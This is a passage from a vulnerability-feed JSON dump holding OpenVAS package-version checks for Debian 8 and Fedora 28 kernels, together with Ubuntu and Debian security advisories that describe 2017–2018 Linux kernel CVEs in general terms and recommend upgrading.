isdpkgvuln(pkg:\"linux-image-3.16.0-5-ixp4xx\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-kirkwood\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-orion5x\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-versatile\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-586\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-686-pae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-686-pae-dbg\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-amd64-dbg\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-armmp\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-armmp-lpae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-ixp4xx\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-kirkwood\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-orion5x\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-6-versatile\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-manual-3.16\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-source-3.16\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-3.16.0-4\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-3.16.0-6\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-4-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-5-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-6-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:54", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-07-12T00:00:00", "id": "OPENVAS:1361412562310874786", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874786", "title": "Fedora Update for kernel FEDORA-2018-d82a45d9ab", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_d82a45d9ab_kernel_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2018-d82a45d9ab\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874786\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-12 06:09:39 +0200 (Thu, 12 Jul 2018)\");\n script_cve_id(\"CVE-2018-12714\", \"CVE-2018-12633\", \"CVE-2018-12232\", \"CVE-2018-10853\",\n \"CVE-2018-11506\", \"CVE-2018-10840\", \"CVE-2018-3639\", \"CVE-2018-1120\",\n \"CVE-2018-10322\", \"CVE-2018-10323\", \"CVE-2018-1108\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2018-d82a45d9ab\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-d82a45d9ab\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6L2AHGVDF5O7XJPPZZVBSBDNW6RK5HYX\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.17.4~200.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:06", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-07-03T00:00:00", "id": "OPENVAS:1361412562310874757", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874757", "title": "Fedora Update for kernel FEDORA-2018-d92fde52d7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_d92fde52d7_kernel_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2018-d92fde52d7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874757\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-03 06:01:31 +0200 (Tue, 03 Jul 2018)\");\n script_cve_id(\"CVE-2018-12633\", \"CVE-2018-12232\", \"CVE-2018-10853\", \"CVE-2018-11506\",\n \"CVE-2018-10840\", \"CVE-2018-3639\", \"CVE-2018-1120\", \"CVE-2018-10322\",\n \"CVE-2018-10323\", \"CVE-2018-1108\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2018-d92fde52d7\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-d92fde52d7\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QGK5XWFJBXPFE4K3ZVUM4BXLGPPTEYTH\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.17.3~200.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-06-24T00:00:00", "id": "OPENVAS:1361412562310874731", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874731", "title": "Fedora Update for kernel FEDORA-2018-2c6bd93875", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_2c6bd93875_kernel_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2018-2c6bd93875\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874731\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-24 06:00:43 +0200 (Sun, 24 Jun 2018)\");\n script_cve_id(\"CVE-2018-12232\", \"CVE-2018-10853\", \"CVE-2018-11506\", \"CVE-2018-10840\",\n \"CVE-2018-3639\", \"CVE-2018-1120\", \"CVE-2018-10322\", \"CVE-2018-10323\",\n \"CVE-2018-1108\", \"CVE-2018-11412\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2018-2c6bd93875\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\npresent on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-2c6bd93875\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3ZX2MJK6W3L6HWB2BTYHWGJCOYG3RMMI\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.17.2~200.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:09", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-06-20T00:00:00", "id": "OPENVAS:1361412562310874710", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874710", "title": "Fedora Update for kernel FEDORA-2018-bb7aab12cb", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_bb7aab12cb_kernel_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2018-bb7aab12cb\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874710\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-20 06:20:48 +0200 (Wed, 20 Jun 2018)\");\n script_cve_id(\"CVE-2018-12232\", \"CVE-2018-10853\", \"CVE-2018-11506\", \"CVE-2018-10840\", \"CVE-2018-3639\", \"CVE-2018-1120\", \"CVE-2018-10322\", \"CVE-2018-10323\", \"CVE-2018-1108\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2018-bb7aab12cb\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-bb7aab12cb\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EPUROU5WET33FBYHDLFA2KUUGYZTHVZ2\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.16.16~300.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2019-05-29T19:21:50", "bulletinFamily": "unix", "description": "Jann Horn discovered that the vmacache subsystem did not properly handle sequence number overflows, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the Linux kernel did not properly handle some indirect calls, reducing the effectiveness of Spectre v2 mitigations for paravirtual guests. A local attacker could use this to expose sensitive information. (CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution and prediction of return addresses via Return Stack Buffer (RSB) may allow unauthorized memory reads via sidechannel attacks. An attacker could use this to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttil\u00c3\u00a4 discovered that the KVM implementation in the Linux kernel did not properly check privilege levels when emulating some instructions. An unprivileged attacker in a guest VM could use this to escalate privileges within the guest. (CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the iSCSI target implementation of the Linux kernel. A remote attacker could use this to cause a denial of service (system crash). (CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of the Linux kernel. A local attacker could use this to cause a denial of service (kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the IRDA implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-6555)\n\nUSN 3652-1 added a mitigation for Speculative Store Bypass a.k.a. Spectre Variant 4 (CVE-2018-3639). This update provides the corresponding mitigation for ARM64 processors. Please note that for this mitigation to be effective, an updated firmware for the processor may be required.", "modified": "2018-10-01T00:00:00", "published": "2018-10-01T00:00:00", "id": "USN-3777-1", "href": "https://usn.ubuntu.com/3777-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-05-29T19:21:46", "bulletinFamily": "unix", "description": "USN-3777-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu 16.04 LTS.\n\nJann Horn discovered that the vmacache subsystem did not properly handle sequence number overflows, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the Linux kernel did not properly handle some indirect calls, reducing the effectiveness of Spectre v2 mitigations for paravirtual guests. A local attacker could use this to expose sensitive information. (CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution and prediction of return addresses via Return Stack Buffer (RSB) may allow unauthorized memory reads via sidechannel attacks. An attacker could use this to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttil\u00c3\u00a4 discovered that the KVM implementation in the Linux kernel did not properly check privilege levels when emulating some instructions. An unprivileged attacker in a guest VM could use this to escalate privileges within the guest. (CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the iSCSI target implementation of the Linux kernel. A remote attacker could use this to cause a denial of service (system crash). (CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of the Linux kernel. A local attacker could use this to cause a denial of service (kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the IRDA implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-6555)\n\nUSN 3653-2 added a mitigation for Speculative Store Bypass a.k.a. Spectre Variant 4 (CVE-2018-3639). This update provides the corresponding mitigation for ARM64 processors. Please note that for this mitigation to be effective, an updated firmware for the processor may be required. \u2018", "modified": "2018-10-01T00:00:00", "published": "2018-10-01T00:00:00", "id": "USN-3777-2", "href": "https://usn.ubuntu.com/3777-2/", "title": "Linux kernel (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}], "debian": [{"lastseen": "2019-09-25T22:36:11", "bulletinFamily": "unix", "description": "Package : linux\nVersion : 3.16.57-2\nCVE ID : CVE-2017-5715 CVE-2017-5753 CVE-2018-1066 CVE-2018-1093\n CVE-2018-1130 CVE-2018-3665 CVE-2018-5814 CVE-2018-9422\n CVE-2018-10853 CVE-2018-10940 CVE-2018-11506 CVE-2018-12233\n CVE-2018-1000204\nDebian Bug : 898165\n\nThe previous update to linux failed to build for the armhf (ARM EABI\nhard-float) architecture. This update corrects that. For all other\narchitectures, there is no need to upgrade or reboot again. For\nreference, the relevant part of the original advisory text follows.\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-5715\n\n Multiple researchers have discovered a vulnerability in various\n processors supporting speculative execution, enabling an attacker\n controlling an unprivileged process to read memory from arbitrary\n addresses, including from the kernel and all other processes\n running on the system.\n\n This specific attack has been named Spectre variant 2 (branch\n target injection) and is mitigated for the x86 architecture (amd64\n and i386) by using new microcoded features.\n\n This mitigation requires an update to the processor's microcode,\n which is non-free. For recent Intel processors, this is included\n in the intel-microcode package from version 3.20180425.1~deb8u1.\n For other processors, it may be included in an update to the\n system BIOS or UEFI firmware, or in a later update to the\n amd64-microcode package.\n\n This vulnerability was already mitigated for the x86 architecture\n by the "retpoline" feature.\n\nCVE-2017-5753\n\n Further instances of code that was vulnerable to Spectre variant 1\n (bounds-check bypass) have been mitigated.\n\nCVE-2018-1066\n\n Dan Aloni reported to Red Hat that the CIFS client implementation\n would dereference a null pointer if the server sent an invalid\n response during NTLMSSP setup negotiation. This could be used by a\n malicious server for denial of service.\n\n The previously applied mitigation for this issue was not\n appropriate for Linux 3.16 and has been replaced by an alternate\n fix.\n\nCVE-2018-1093\n\n Wen Xu reported that a crafted ext4 filesystem image could trigger\n an out-of-bounds read in the ext4_valid_block_bitmap() function. A\n local user able to mount arbitrary filesystems could use this for\n denial of service.\n\nCVE-2018-1130\n\n The syzbot software found that the DCCP implementation of\n sendmsg() does not check the socket state, potentially leading\n to a null pointer dereference. A local user could use this to\n cause a denial of service (crash). \n\nCVE-2018-3665\n\n Multiple researchers have discovered that some Intel x86\n processors can speculatively read floating-point and vector\n registers even when access to those registers is disabled. The\n Linux kernel's "lazy FPU" feature relies on that access control to\n avoid saving and restoring those registers for tasks that do not\n use them, and was enabled by default on x86 processors that do\n not support the XSAVEOPT instruction.\n\n If "lazy FPU" is enabled on one of the affected processors, an\n attacker controlling an unprivileged process may be able to read\n sensitive information from other users' processes or the kernel.\n This specifically affects processors based on the "Nehalem" and\n "Westemere" core designs.\n \n This issue has been mitigated by disabling "lazy FPU" by default\n on all x86 processors that support the FXSAVE and FXRSTOR\n instructions, which includes all processors known to be affected\n and most processors that perform speculative execution. It can\n also be mitigated by adding the kernel parameter: eagerfpu=on\n\nCVE-2018-5814\n\n Jakub Jirasek reported race conditions in the USB/IP host driver.\n A malicious client could use this to cause a denial of service\n (crash or memory corruption), and possibly to execute code, on a\n USB/IP server.\n\nCVE-2018-9422\n\n It was reported that the futex() system call could be used by an\n unprivileged user for privilege escalation.\n\nCVE-2018-10853\n\n Andy Lutomirski and Mika Penttil\u00e4 reported that KVM for x86\n processors did not perform a necessary privilege check when\n emulating certain instructions. This could be used by an\n unprivileged user in a guest VM to escalate their privileges\n within the guest.\n\nCVE-2018-10940\n\n Dan Carpenter reported that the optical disc driver (cdrom) does\n not correctly validate the parameter to the CDROM_MEDIA_CHANGED\n ioctl. A user with access to a cdrom device could use this to\n cause a denial of service (crash).\n\nCVE-2018-11506\n\n Piotr Gabriel Kosinski and Daniel Shapira reported that the\n SCSI optical disc driver (sr) did not allocate a sufficiently\n large buffer for sense data. A user with access to a SCSI\n optical disc device that can produce more than 64 bytes of\n sense data could use this to cause a denial of service (crash\n or memory corruption), and possibly for privilege escalation.\n\nCVE-2018-12233\n\n Shankara Pailoor reported that a crafted JFS filesystem image\n could trigger a denial of service (memory corruption). This\n could possibly also be used for privilege escalation.\n\nCVE-2018-1000204\n\n The syzbot software found that the SCSI generic driver (sg) would\n in some circumstances allow reading data from uninitialised\n buffers, which could include sensitive information from the kernel\n or other tasks. However, only privileged users with the\n CAP_SYS_ADMIN or CAP_SYS_RAWIO capability were allowed to do this,\n so this has little or no security impact.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n3.16.57-1. This update additionally fixes Debian bug #898165, and\nincludes many more bug fixes from stable update 3.16.57.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \nBen Hutchings - Debian developer, member of kernel, installer and LTS teams", "modified": "2018-07-15T03:02:08", "published": "2018-07-15T03:02:08", "id": "DEBIAN:DLA-1422-2:DC70E", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201807/msg00016.html", "title": "[SECURITY] [DLA 1422-2] linux security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-25T22:36:29", "bulletinFamily": "unix", "description": "Package : linux\nVersion : 3.16.57-1\nCVE ID : CVE-2017-5715 CVE-2017-5753 CVE-2018-1066 CVE-2018-1093\n CVE-2018-1130 CVE-2018-3665 CVE-2018-5814 CVE-2018-9422\n CVE-2018-10853 CVE-2018-10940 CVE-2018-11506 CVE-2018-12233\n CVE-2018-1000204\nDebian Bug : 898165\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nThis update is not yet available for the armhf (ARM EABI hard-float)\narchitecture.\n\nCVE-2017-5715\n\n Multiple researchers have discovered a vulnerability in various\n processors supporting speculative execution, enabling an attacker\n controlling an unprivileged process to read memory from arbitrary\n addresses, including from the kernel and all other processes\n running on the system.\n\n This specific attack has been named Spectre variant 2 (branch\n target injection) and is mitigated for the x86 architecture (amd64\n and i386) by using new microcoded features.\n\n This mitigation requires an update to the processor's microcode,\n which is non-free. For recent Intel processors, this is included\n in the intel-microcode package from version 3.20180425.1~deb8u1.\n For other processors, it may be included in an update to the\n system BIOS or UEFI firmware, or in a later update to the\n amd64-microcode package.\n\n This vulnerability was already mitigated for the x86 architecture\n by the "retpoline" feature.\n\nCVE-2017-5753\n\n Further instances of code that was vulnerable to Spectre variant 1\n (bounds-check bypass) have been mitigated.\n\nCVE-2018-1066\n\n Dan Aloni reported to Red Hat that the CIFS client implementation\n would dereference a null pointer if the server sent an invalid\n response during NTLMSSP setup negotiation. This could be used by a\n malicious server for denial of service.\n\n The previously applied mitigation for this issue was not\n appropriate for Linux 3.16 and has been replaced by an alternate\n fix.\n\nCVE-2018-1093\n\n Wen Xu reported that a crafted ext4 filesystem image could trigger\n an out-of-bounds read in the ext4_valid_block_bitmap() function. A\n local user able to mount arbitrary filesystems could use this for\n denial of service.\n\nCVE-2018-1130\n\n The syzbot software found that the DCCP implementation of\n sendmsg() does not check the socket state, potentially leading\n to a null pointer dereference. A local user could use this to\n cause a denial of service (crash). \n\nCVE-2018-3665\n\n Multiple researchers have discovered that some Intel x86\n processors can speculatively read floating-point and vector\n registers even when access to those registers is disabled. The\n Linux kernel's "lazy FPU" feature relies on that 